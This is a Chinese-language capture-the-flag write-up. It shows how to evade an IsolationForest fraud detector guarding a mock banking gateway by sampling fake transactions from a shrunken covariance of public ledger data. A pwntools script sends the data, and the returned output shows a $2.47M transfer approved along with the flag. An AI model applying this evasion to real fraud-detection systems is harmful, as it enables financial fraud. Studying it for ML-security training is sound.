即使是符合正态分布的数据，落在 3 之外的点依然会被孤立森林认为足够稀少从而判定为异常。因此我们的解题策略是协方差收缩，引入一个收缩因子 ()，将生成的协方差矩阵设为，这会使得生成的点在保持特征间相关性的同时在空间上极度向均值中心收缩。这样生成的数据都位于模型认为正常的区域，这些点的路径长度会达到最大值从而避开警报。

python

1import pandas as pd2import numpy as np3from pwn import *4 5df = pd.read_csv('public_ledger.csv')6context.log_level = 'debug'7# io = remote('IP', PORT)8 9# 统计学建模10mu = df.mean().values11sigma = df.cov().values12 13# 收缩因子14shrinkage_factor = 0.115# 样本总量16num_samples = 7000 17 18fake_data = np.random.multivariate_normal(mu, sigma * shrinkage_factor, num_samples)19 20gen_df = pd.DataFrame(fake_data, columns=[f'feat_{i}' for i in range(20)])21 22total_amount = gen_df['feat_0'].sum()23print(f"预估总金额 ${total_amount:.2f}")24 25io.recvuntil(b"Waiting for CSV Data Stream (End with 'EOF')...")26io.send(gen_df.to_csv(index=False).encode('utf-8'))27io.send(b"\nEOF\n")28io.interactive()

得到返回：

text

1[--- SECURE BANKING GATEWAY v4.0 ---]2Task: Transfer > $2,000,000.003Security: IsolationForest (Strict Mode)4Constraints:51. No Transaction can be classified as Anomaly (-1).62. No Replay Attacks (Public data is blacklisted).73. No Duplicate Transactions.8-------------------------------------9Waiting for CSV Data Stream (End with 'EOF')...10[-] Analyzing Statistical Distribution...11Report: Value=$2,474,525.36 | Anomalies=0/700012[SUCCESS] Transaction Authorized.13Flag: "flag{79081194-427f-4d3b-ae5d-7dce04fe5a90}"

FLAG

text

1flag{79081194-427f-4d3b-ae5d-7dce04fe5a90}